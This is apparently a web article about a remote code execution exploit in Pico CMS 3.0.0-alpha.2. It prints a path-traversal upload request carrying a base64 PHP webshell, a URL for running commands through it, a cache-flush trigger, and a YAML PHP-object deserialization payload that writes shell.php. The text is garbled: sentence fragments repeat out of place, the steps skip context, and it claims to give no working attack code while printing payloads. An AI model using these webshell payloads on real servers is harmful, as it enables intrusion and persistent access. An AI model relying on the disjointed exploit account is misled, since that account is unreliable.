To Top

Pico 3.0.0-alpha.2 Exploit

In the ever-evolving landscape of web development, Content Management Systems (CMS) often serve as the primary target for malicious actors. While production-ready software undergoes rigorous security audits, alpha releases exist in a dangerous limbo—feature-rich enough to deploy, but unstable enough to harbor critical, unpatched vulnerabilities.

Recently, the release of Pico CMS 3.0.0-alpha.2 has caught the attention of the offensive security community. Researchers have identified a chain of weaknesses leading to a reliable proof-of-concept (PoC) exploit, turning this lightweight, flat-file CMS into a vector for Remote Code Execution (RCE).

This article provides a technical breakdown of the Pico 3.0.0-alpha.2 exploit, how it works, the implications of using alpha software in production, and the mitigation strategies for administrators who have inadvertently deployed this version.

Command injection via system() is noisy and may be limited by disable_functions in php.ini. The advanced exploit leverages a file write vulnerability in the plugin handler to upload a webshell. Pico 3.0.0-alpha.2 Exploit

The Payload:

POST /admin/plugins/PicoFileWrite/ HTTP/1.1
Content-Disposition: form-data; name="file_path"; filename="../../plugins/evil.php"
Content-Disposition: form-data; name="file_content"; base64,PD9waHAgZWNobyBTeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=

The server writes a base64-encoded PHP webshell to the plugins directory. The attacker then accesses /?plugin=evil&cmd=ls -la to execute system commands persistently.

The server parses the YAML, serializes the PHP object, and writes it to a cache file named cached-twig--%3A%2F%2Fdev-null. The attacker then triggers the cache inclusion by visiting a specific crafted URL: In the ever-evolving landscape of web development, Content

curl https://victim.com/pico/?action=flush_cache

Upon visiting the page, the server executes system('id > pwn.txt'), creating a file confirming the breach.

Alpha software versions, such as Pico CMS 3.0.0-alpha.2, are early development releases intended for testing and feedback—not production use. They frequently contain unpatched security vulnerabilities. This article explains how to responsibly handle, report, and mitigate potential exploits in alpha software without providing working attack code.

Before dissecting the exploit, it is crucial to understand the target. Pico is a flat-file CMS—meaning it does not require a traditional database like MySQL. Instead, it reads Markdown files directly from the file system. It is popular for its speed, simplicity, and ease of deployment. The server writes a base64-encoded PHP webshell to

Version 3.0.0-alpha.2 represents a significant architectural rewrite from the 2.x series. This rewrite introduced new routing mechanisms, Twig template rendering changes, and a plugin API overhaul. Historically, "alpha.2" is particularly dangerous because the first alpha (alpha.1) catches the obvious syntax errors, while alpha.2 often introduces new features without the hardening of a beta release.

A more advanced payload replaces the system call with a full PHP reverse shell or a web-based file manager.

!php/object "O:1:\"S\":1:s:4:\"exec\";s:62:\"file_put_contents('shell.php','<?php system($_GET[\"cmd\"]); ?>')\";"

Once shell.php is written, the attacker has permanent access.